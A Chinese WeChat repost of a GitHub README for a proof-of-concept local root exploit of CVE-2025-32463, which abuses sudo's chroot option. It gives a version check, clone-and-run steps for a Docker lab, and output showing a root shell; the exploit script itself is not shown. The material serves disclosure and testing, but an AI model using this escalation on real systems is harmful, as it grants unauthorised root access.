通过带有 chroot 选项的 sudo 二进制文件将权限提升至 root CVE-2025-32463
原文链接: https://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247531729&idx=2&sn=670e1a9a5783709fe9c44ad380ee9354
通过带有 chroot 选项的 sudo 二进制文件将权限提升至 root CVE-2025-32463
Ots安全 2025-07-07 08:37
该存储库提供了一个最小的、可重现的环境来演示chroot 功能中的CVE-2025-32463权限提升缺陷。sudo
文件 | 目的 |
---|---|
Dockerfile | 使用易受攻击的sudo 1.9.16p2和构建工具构建 Ubuntu 24.04 映像 |
sudo‑chwoot.sh | 概念验证漏洞,在 chroot 中生成 root shell |
|
构建镜像(如果需要)并启动漏洞利用容器的辅助脚本 |
受影响的版本
大多数 Linux 发行版上的sudo 1.9.14至1.9.17(所有 p 修订版)的易受攻击的版本均受到影响。
快速漏洞检查
# Vulnerable sudo
pwn ~ $ sudo -R woot woot
sudo: woot: No such file or directory
# Patched sudo
pwn ~ $ sudo -R woot woot
[sudo] password for pwn:
sudo: you are not permitted to use the -R option with woot
在 Docker 容器中测试漏洞利用
# 1 – clone repo
$ git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.git
$ cd CVE-2025-32463_chwoot
# 2 – build and run Docker image (tagged "sudo-chwoot")
$ ./run.sh
# 3 – run exploit in container (runs root command directly or drops you into a root shell)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh id
woot!
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh
woot!
root@f722d9182d1f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
root@f722d9182d1f:/#
run.sh传递–privileged到–rmDocker,以便容器在您退出时自行清理。
清理
完成后删除图像:
docker rmi sudo-chwoot
项目地址:
https://github.com/pr0v3rbs/CVE-2025-32463_chwoot
感谢您抽出
.
.
来阅读本文
点它,分享点赞在看都在这